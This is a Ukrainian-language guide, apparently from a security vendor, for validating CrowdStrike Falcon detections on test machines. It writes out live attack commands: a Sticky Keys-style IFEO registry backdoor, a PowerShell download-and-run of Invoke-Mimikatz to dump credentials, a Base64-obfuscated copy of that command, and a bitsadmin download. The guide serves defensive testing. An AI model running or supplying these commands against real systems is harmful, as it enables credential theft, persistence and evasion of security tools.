Сценарії тестування¶
Використовуйте тестові машини
Сценарії тестування можуть використовувати third-party інструменти або завдавати шкоди операційній системі. Не виконуйте їх на робочих машинах чи в production середовищі!
Сценарії не працюють в RFM
Перед початком тестування перевірте стан RFM - див. Reduced Functionality Mode
Атака на реєстр через Довідку при введенні¶
Дана атака, також відома як "Sticky Keys attack", використовує функції доступу Windows, які можуть запускатися за допомогою комбінації клавіш до того, як користувач увійде в систему. Зловмисник може змінити спосіб запуску цих програм, щоб отримати командний рядок або бекдор без входу в систему.
Атака¶
Відкрийте cmd.exe і виконайте наступну команду:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
Що відбулося?¶
Ми змінили запис у реєстрі Windows для програми osk.exe (екранна клавіатура). Параметр Debugger в Image File Execution Options змушує систему запускати вказану програму (cmd.exe) кожного разу, коли викликається osk.exe.
Оскільки екранну клавіатуру можна запустити з екрану входу в систему (через меню спеціальних можливостей), зловмисник може отримати доступ до командного рядка з високими привілеями, не входячи в систему. CrowdStrike детектує таку маніпуляцію з реєстром як спробу закріплення в системі (persistence).
Демпінг облікових даних за допомогою Mimikatz¶
Демпінг облікових даних - це процес отримання логінів та паролів, зазвичай у вигляді хешу або відкритого тексту, з операційної системи. Облікові дані можуть бути використані для бічного переміщення та доступу до інформації з обмеженим доступом.
Атака¶
Відкрийте cmd.exe і виконайте наступну команду:
powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds;"
Що відбулося?¶
Ми завантажили та виконали в пам'яті скрипт Invoke-Mimikatz.ps1. Mimikatz — це відомий інструмент, який здатний витягувати паролі, хеші, PIN-коди та квитки Kerberos з пам'яті процесу lsass.exe.
CrowdStrike розпізнає спробу виконання Mimikatz та доступу до процесу lsass як зловмисну активність, спрямовану на викрадення облікових даних, і блокує її.
Демпінг облікових даних (закодована команда)¶
Подібно до попереднього сценарію, у цьому випадку ми спробуємо виконати ту саму команду, але цього разу з використанням маскування за допомогою кодування Base64.
Атака¶
Відкрийте cmd.exe і виконайте наступну команду:
powershell.exe -EncodedCommand "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAYIGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AbgBkAGUAZQBiAGUAZQAvAFAAUwBfAFMAYwByAGkAcAB0AHMALwBtAGEAaQBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAZICkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzAA=="
Що відбулося?¶
Атака ідентична попередній, але сама команда для PowerShell була закодована у Base64. Це поширений метод, який зловмисники використовують, щоб обійти антивірусні програми, що шукають шкідливі команди за ключовими словами (наприклад, "Mimikatz").
CrowdStrike аналізує не тільки самі команди, але й їхню поведінку. Навіть якщо команда закодована, PowerShell її розкодує перед виконанням. На етапі виконання CrowdStrike виявить зловмисну поведінку (завантаження та запуск Mimikatz) і заблокує її.
Виконання шкідливого коду JavaScript через rundll32¶
Програма rundll32.exe може бути викликана для виконання довільного коду з DLL-файлів. Зловмисники можуть скористатися цією функціональністю для проксі-виконання коду, щоб уникнути спрацьовування засобів безпеки.
Атака¶
Відкрийте cmd.exe і виконайте наступну команду:
Що відбулося?¶
Ми використали легітимну системну утиліту rundll32.exe для виконання довільного JavaScript коду. Цей метод дозволяє обійти обмеження на запуск скриптових файлів.
CrowdStrike фіксує, що системний процес rundll32.exe використовується не за призначенням (для запуску JavaScript), що є підозрілою активністю, і створює відповідний Detection.
Видалення тіньових копій¶
Зловмисники, зокрема програми-вимагачі (ransomware), можуть вимикати або видаляти функції відновлення системи, щоб унеможливити відновлення зашифрованих даних.
Атака¶
Відкрийте cmd.exe і виконайте наступну команду:
Що відбулося?¶
Ми виконали команду для видалення всіх тіньових копій на диску. Тіньові копії — це механізм Windows для резервного копіювання файлів, і їх знищення є типовим кроком для програм-вимагачів перед шифруванням файлів.
CrowdStrike розпізнає цю дію як деструктивну та характерну для ransomware, тому блокує її та створює відповідний алерт.
Завантаження файлу через BITS¶
Windows має службу фонової інтелектуальної передачі (BITS), яка може бути використана для завантаження файлів на скомпрометовану кінцеву точку. Зловмисники використовують BITS, щоб завантажити шкідливий код, оминаючи деякі види мережевих засобів моніторингу.
Атака¶
Відкрийте cmd.exe з правами адміністратора і виконайте наступну команду:
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin_flag.ps1
Що відбулося?¶
Ми використали утиліту bitsadmin.exe для завантаження файлу з Інтернету. Хоча bitsadmin є легітимним інструментом Windows, зловмисники часто використовують його для завантаження шкідливих файлів, оскільки його трафік може маскуватися під системний і не викликати підозр у мережевих фільтрів.
CrowdStrike відстежує використання потенційно небезпечних утиліт, як bitsadmin, і може заблокувати завантаження або попередити про підозрілу активність.
Потенційно небажані програми (PUP)¶
Потенційно небажані програми (PUP) - це тип програм, який може опинитися на пристрої без відома користувача. Присутність такого програмного забезпечення є небажаною в корпоративному середовищі. PUP часто постачаються разом з безкоштовним програмним забезпеченням або поширюються через оманливу рекламу.
Підготовка¶
Завантажте інсталятор: OneLaunch
Атака¶
Запустіть завантажений інсталятор.
Що відбулося?¶
Хоча PUP не обов'язково є шкідливими, вони можуть порушувати політику безпеки компанії, сповільнювати роботу системи або збирати телеметрію. CrowdStrike, в залежності від налаштувань політики, виявляє та блокує встановлення таких програм для підтримання корпоративних стандартів безпеки.
IP-сканери¶
IP-сканери можуть використовуватися зловмисниками для розвідки мережі та виявлення вразливих систем. Вони часто застосовуються на етапі розвідки для виявлення відкритих портів, служб та системної інформації, що дозволяє знайти потенційні точки входу.
Підготовка¶
Завантажте інсталятор: Angry IP Scanner
Атака¶
Запустіть завантажений інсталятор.
Що відбулося?¶
IP-сканери є інструментами подвійного призначення: їх використовують як системні адміністратори, так і зловмисники. У корпоративному середовищі неконтрольоване використання таких інструментів може становити загрозу. CrowdStrike ідентифікує запуск відомих IP-сканерів як потенційно небезпечну дію, що може передувати атаці, та блокує процес.
Несанкціонована спроба видалення сенсору¶
Зловмисник або недобросовісний користувач може спробувати видалити або відключити сенсор CrowdStrike з метою уникнення виявлення своєї активності.
Атака¶
Спробуйте видалити CrowdStrike Falcon Sensor через панель керування ("Програми та засоби") або за допомогою командного рядка, не маючи токену для видалення (maintenance token).
Що відбулося?¶
Сенсор CrowdStrike має вбудований механізм захисту від несанкціонованого втручання (tamper protection). Будь-яка спроба видалити або зупинити сенсор без спеціального токену буде заблокована. Ця подія буде зафіксована і надіслана в консоль CrowdStrike як спроба обходу захисту.